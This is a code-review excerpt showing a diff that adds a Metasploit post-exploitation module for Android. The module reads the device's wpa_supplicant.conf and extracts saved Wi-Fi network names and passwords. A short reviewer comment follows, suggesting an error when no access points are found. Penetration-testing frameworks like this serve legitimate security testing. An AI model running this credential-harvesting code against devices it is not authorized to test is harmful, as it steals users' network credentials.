modules/post/android/gather/wireless_ap.rb

```diff
@@ -0,0 +1,87 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  Rank = NormalRanking
+
+  include Msf::Post::Common
+  include Msf::Post::File
+  include Msf::Post::Android::System
+
+  def initialize(info={})
+    super( update_info( info, {
+        'Name'          => "Displays wireless SSIDs and PSKs",
+        'Description'   => %q{
+            This module displays all wireless AP creds saved on the target device.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [
+            'Auxilus'
+        ],
+        'SessionTypes'  => [ 'meterpreter', 'shell' ],
+        'Platform'       => 'android',
+      }
+    ))
+  end
+
+  def run
+    data = read_file("/data/misc/wifi/wpa_supplicant.conf")
+    parsed = data.split("network=")
+    aps ||= []
+    parsed.each do |block|
+      next if block.split("ssid")[1].nil?
+      ssid = block.split("ssid")[1].split("=")[1].split("\n").first.gsub(/"/, '')
+      if search_token(block, "wep_key0")
+        net_type = "WEP"
+        pwd = get_password(block, "wep_key0")
+      elsif search_token(block, "psk")
+        net_type = "WPS"
+        pwd = get_password(block, "psk")
+      else
+        net_type = "OPEN"
+        pwd = '-'
+      end
+
+      aps << [ssid, net_type, pwd]
+    end
+
```

Comment:
The remainder of this method will execute even if `aps.empty?`, including the `print_good`.

It might be nice to bail out with an error message if `aps.empty?`

```ruby
    if aps.empty?
      print_error('No access points were found in the wpa_supplicant file')
      return
    end
```